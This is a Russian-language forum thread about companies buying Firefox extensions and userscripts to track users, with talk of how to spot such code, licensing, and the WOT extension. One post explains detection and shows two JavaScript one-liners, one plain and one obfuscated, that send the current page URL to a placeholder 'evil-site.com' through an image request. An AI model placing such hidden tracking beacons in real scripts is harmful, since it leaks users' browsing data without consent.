Компания скупает расширения для Firefox и шпионит через них.

vom · №26

Infocatcher
Я не про этот скрипт, а про те, где по миллиону, сотне тысяч установок. А про этот, имел ввиду, может кто-то пользуется. И думал, возможно есть какие-то методики быстрой проверки, например по доменам.

Добавлено 28-02-2013 23:16:14
KooL
В данном случае это не такая серьезная проблема, ее почти и нет для подавляющего большинства, чтобы реализовывать.

Отредактировано vom (28-02-2013 23:16:47)

Infocatcher · №27

vom
Я понял.
Быстрая проверка – это если код не пытались прятать. Тогда надо проверять вызовы GM_xmlhttpRequest(), создание изображений, скриптов, стилей (всего, что может грузиться извне).
Но одно дело найти

Выделить код

Код:

new Image().src = "http://evil-site.com/track.php?url=" + encodeURIComponent(location.href);

И совсем другое, когда там что-нибудь вроде

Выделить код

Код:

new I\u006dage()["sr" + "c"] = "http://evil-site.com/track.php?url=" + encode\u0055RIComponent(location.href);

KooL · №28

vom
Нормальная проблема, скоро ФФ будет по умолчанию блокировать все сторонние куки, а из-за этого что-то может не работать даже на сайтах.

vom · №29

Infocatcher
Спасибо за ликбез, не представлял даже, что такое возможно. Ну если нет доступа к закладкам, истории, кукам от других сайтов, вряд ли это кому-нибудь понадобится.
KooL
Ну в смартфонах принципиальная проблема, т.к. можно быстро заработать, вывев деньги со счета. А насчет кук, в основном то все работает, и для гигантов рынка то всеравно оставят их.

BAd · №30

Вот перекупит кто нибудь адблок с носкриптом и прощай фаерфокс. Печально.

KooL · №31

BAd пишет

Вот перекупит кто нибудь адблок с носкриптом и прощай фаерфокс. Печально.

Здравствуй Lynx?

Zaycoff · №32

BAd пишет

Вот перекупит кто нибудь адблок с носкриптом и прощай фаерфокс.

Сомневаюсь, что их продадут, уж слишком популярны, наверняка неплохой донат идёт от пользователей (NoScript по умолчанию просит 15$, а Adblock Plus - 5$, они бы столько не просили, если бы народ не жертвовал). Думаю и Mozilla Foundation им маленько приплачивает.

Притом эти дополнения опенсорс: NoScript - GPLv2, Adblock Plus - GPLv3, даже если их и продадут, то найдутся те, кто подхватит знамя и сделают нечто другое на их основе.

KooL пишет

Здравствуй Lynx?

Лучше уж [chromium] , в принципе для него есть неплохой аналог NoScript (мне он даже больше нравится, чем оригинальный NoScript), называется ScriptSafe, а вот с адблоком там похуже, то что сделали для хромого явно не дотягивает до версии под [firefox]

KooL · №33

Там расширения не следят?

Zaycoff · №34

KooL пишет

Там расширения не следят?

Может и следят, нужно читать политики приватности...

Но в любом случае Lynx - это не выход, слишком много сайтов отвалится, т.к. с поддержкой стандартов у него фигова-то...

Отредактировано Zaycoff (01-03-2013 11:02:34)

Zaycoff · №35

okkamas_knife пишет

то есть вроде бы всё ок с текстом но есть нюанс учитывая который дополнение совершенно законно следит хоть прямо об этом не написано, а доверять АМО в этом случае глупо.

Тогда остаётся только юзать голый [ie] или [chromium] с политиками запрещения по умолчанию на приём куков и запуск скриптов - у них хотя бы это можно, и разрешать их для каждого сайта индивидуально (правда [ie] весь мозг вынесет запросами на запуск каждого скрипта по отдельности)
вот только не знаю стучит в центр или нет?

krigstask · №36

Zaycoff пишет

вот только не знаю стучит в центр или нет?

Я знаю.

BAd · №37

okkamas_knife пишет

почему?

Популярность фаерфокс пострадает.

KooL пишет

Здравствуй Lynx?

Здравствуй опера, опять.

Zaycoff пишет

NoScript - GPLv2, Adblock Plus - GPLv3

Можно у автора купить права на программу, потом сменить лицензию, закрыть исходники и всё.

Отредактировано BAd (01-03-2013 21:54:22)

KooL · №38

Сменить лицензию можно только для новых версий, лень смотреть как там разработки ведутся, но если есть коммиты от сторонних авторов, то нужно согласие каждого, кто хоть строчку написал и она была использована. Да и закрыть исходники тут непросто.

BAd пишет

Здравствуй опера, опять.

Опера не следит, ога.

pohunohi · №39

Zaycoff пишет

Может и следят, нужно читать политики приватности...

Там их вообще не проверяют.

Ps. И вообще господа, не узайте хромоги, от них тупеют.

Infocatcher · №40

Кстати от расширениях, сменивших автора.

http://www.captaincaveman.nl/news-devel … bsubid=100
Расширения: http://www.captaincaveman.nl/firefox-extensions.aspx
Профиль на AMO: https://addons.mozilla.org/firefox/user/620/

Теперь часть перешла к некому (кой?) ppclick.
Смотрим и видим в большинстве расширений подобный код:
https://addons.mozilla.org/firefox/file … y.js#L1416 (тут, правда, другой автор был, но код других расширений не посмотреть онлайн)

Выделить код

Код:

//installing first time
var EUObjIEView = {
    SetExistingUser : function() {
        var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
        
        try{    
            prefManager.getBoolPref("extensions.ieview.use");
        }
        catch(ex) {
            prefManager.setBoolPref("extensions.ieview.use", true);
        }
    }
}
setTimeout(function() { EUObjIEView.SetExistingUser() }, 2000);

При этом выставляемая настройка (в данном случае extensions.ieview.use) больше нигде не используется.
Вот зачем это может быть нужно?
Настройка останется после удаления расширения, но что это даст?

И это не считая создания никому не нужного глобального объекта.

В общем-то ничего такого, но очень странно.

Infocatcher · №41

Совсем забыл про экспериментальные версии.
Вот это уже интереснее:
https://addons.mozilla.org/firefox/file … y.js#L1414

Добавлено 02-03-2013 00:23:43
На первый взгляд, встраивает опциональную, вроде как, рекламу. В первый раз открывает http://360addons.com/ieview.htm.

Отредактировано Infocatcher (02-03-2013 00:23:43)

geczu · №42

Infocatcher
А вы кликаете по кнопочке "Жалоба" для таких расширений?

Infocatcher · №43

geczu
А это запрещено? Где соответствующий пункт правил?

Добавлено 02-03-2013 15:07:39
У них даже вот такое есть:

if any information about the user or usage of the AMO Contribution is collected or transmitted outside of the user's computer, the details of this collection will be provided in the description of the AMO Contribution and you will provide a link to a privacy policy detailing how the information is managed and protected;

Отредактировано Infocatcher (02-03-2013 15:07:39)

KooL · №44

А что думаете по поводу платных расширений, почему такого нет?

Infocatcher · №45

Кто же будет платить, когда вон там вот куча бесплатных? Видимо, выгоднее встраивать рекламу в «чужие» и бесплатные.
А платные есть, но, кажется, все с бесплатной упрощенной версией:
Pearl Crescent Page Saver Basic
FireShot
Quicktext

KooL · №46

По аналогии с Андроидом, есть Маркет, а есть, например, 4пда. Но платят ведь. К тому же берём в учёт страны, которые платят, то есть США, Япония, Южная Корея.

Отредактировано KooL (03-03-2013 00:24:10)

geczu · №47

4pda получает основной доход пиратства. Он вроде собирается свой магазин открыть, как только на него надавят он быстренько сдуется. Или, если начнёт легализоваться, то тоже прикроет пиратство. На некоторых его страницах такое уже есть, там запрещено публиковать ключи и ломанный софт.
Да там еще есть бесплатные программы, программы с xda, инструкции по root и прошивки. Но многие инструкции завязаны на платный софт, который лежит там ломанным.

И ничто конечно же не мешает мозиле кроме репутации сделать все платным. Для большинства хватит простенького открытого кода. Обычный пользователь поленится ломать что-то.

Добавлено 08-04-2013 12:33:31
А Mozilla, если там есть грамотный менеджер должна ужесточить политику сбора статистики. Например: включаться соединение должно только с согласия пользователя.

Отредактировано geczu (08-04-2013 12:33:31)

Пандёнок · №48

Zaycoff пишет

там прямо сообщают, что по запросу компетентных органов сдадут с потрохами всю инфу о посещённых пользователем сайтах.

При обыске сдадут в любом случае. А вообще я не считаю ВОТ вредным расширением.

Zaycoff · №49

Пандёнок пишет

А вообще я не считаю ВОТ вредным расширением.

А оно не вредное, оно просто сообщает в дата-центр о каждой посещённой пользователем страничке, притом сообщая его уникальный id без особой на то необходимости, т.е. фактически добавляет в [firefox] функционал от [chrome] , притом хромой уже частично отказался от такой практики, а в , благодаря WOT, она появилась...

япогс · №50

Zaycoff пишет

Пандёнок пишет: А вообще я не считаю ВОТ вредным расширением.А оно не вредное, оно просто сообщает в дата-центр о каждой посещённой пользователем страничке, притом сообщая его уникальный id без особой на то необходимости, т.е. фактически добавляет в функционал от , притом хромой уже частично отказался от такой практики, а в , благодаря WOT, она появилась...

Но ведь и незаменимое, с таким функционалом больше нет расширений (чтоб маской плохой сайт перекрывало) или я ошибаюсь?

Полезная информация

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Код:

Код:

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Код:

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Re: Компания скупает расширения для Firefox и шпионит через них.

Board footer